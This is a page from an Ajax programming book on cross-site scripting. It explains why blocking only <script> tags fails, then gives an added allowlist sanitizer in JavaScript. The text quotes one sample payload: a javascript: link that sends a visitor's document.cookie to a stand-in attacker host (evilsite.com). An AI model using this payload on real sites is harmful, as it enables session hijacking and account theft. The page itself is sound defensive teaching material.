AJAX - The Complete Reference

(avery) #1

314 Part II: Developing an Ajax Library


Addressing XSS


Before you start disabling JavaScript in your browser, understand that the XSS security
problem isn't really the fault of JavaScript; instead, the creator of the Web application is to
blame here. The previous example should not allow a user to submit script in a message
post. You might be tempted to start addressing this by simply forbidding the inclusion of
the <script> tag in posts. That will defeat a few less sophisticated intruders, but there are
many other ways to include script. For example, if links are allowed, an attacker could
make a post whose link invokes a javascript: pseudo-URL:

I really disagree with this post, please take a look <a href="javascript: var cookieMonster = new Image(); cookieMonster.src='http://www.evilsite.com/cookiecollecter.php?stolencookie='+escape(document.cookie);">at my response</a>

FIGURE 7-9 Post your own evil comments on this unsecured blog.
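To make the point concrete, here is an added example (not code from the book) contrasting the <script>-blacklist approach the text warns against with an allowlist sanitizer for message-board posts. The sanitizer HTML-escapes everything and rebuilds only one permitted construct, an <a href="..."> link, and only when the URL scheme is http or https; the function names and sample posts are assumptions constructed for this illustration.

```javascript
// Added example, not from the book: blacklist vs. allowlist handling of user posts.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape every HTML-significant character so user text renders as literal text.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// The approach the text warns against: strip <script> tags and pass the rest through.
// A javascript: link contains no <script> tag, so it survives untouched.
function naiveScriptFilter(post) {
  return post.replace(/<\/?script[^>]*>/gi, "");
}

// Accept only absolute http(s) URLs. Control characters and whitespace are removed
// before the check because browsers ignore them when they parse the scheme.
function isSafeHref(href) {
  const cleaned = href.replace(/[\u0000-\u0020]/g, "");
  return /^https?:\/\//i.test(cleaned);
}

// Allowlist sanitizer: escape all text, then re-emit <a href="URL">label</a> only when
// the URL passes isSafeHref. A rejected link is shown as literal text, never rendered.
function sanitizePost(post) {
  const linkPattern = /<a\s+href\s*=\s*"([^"]*)"\s*\/?>([\s\S]*?)<\/a>/gi;
  let out = "";
  let last = 0;
  for (const m of post.matchAll(linkPattern)) {
    out += escapeHtml(post.slice(last, m.index));
    const [whole, href, label] = m;
    if (isSafeHref(href)) {
      out += `<a href="${escapeHtml(href)}" rel="nofollow">${escapeHtml(label)}</a>`;
    } else {
      out += escapeHtml(whole);
    }
    last = m.index + whole.length;
  }
  return out + escapeHtml(post.slice(last));
}

// Constructed sample posts: one with a javascript: link, one with a normal link.
const EVIL_POST = 'I really disagree, see <a href="javascript: void(0)">my response</a>';
const GOOD_POST = 'See <a href="https://example.com/page?a=1&b=2">here</a> & <script>x()</script>';
```

Running `naiveScriptFilter(EVIL_POST)` returns the post unchanged, with the javascript: link still live, while `sanitizePost(EVIL_POST)` renders the whole link as escaped text and `sanitizePost(GOOD_POST)` keeps the https link but neutralises the script tag.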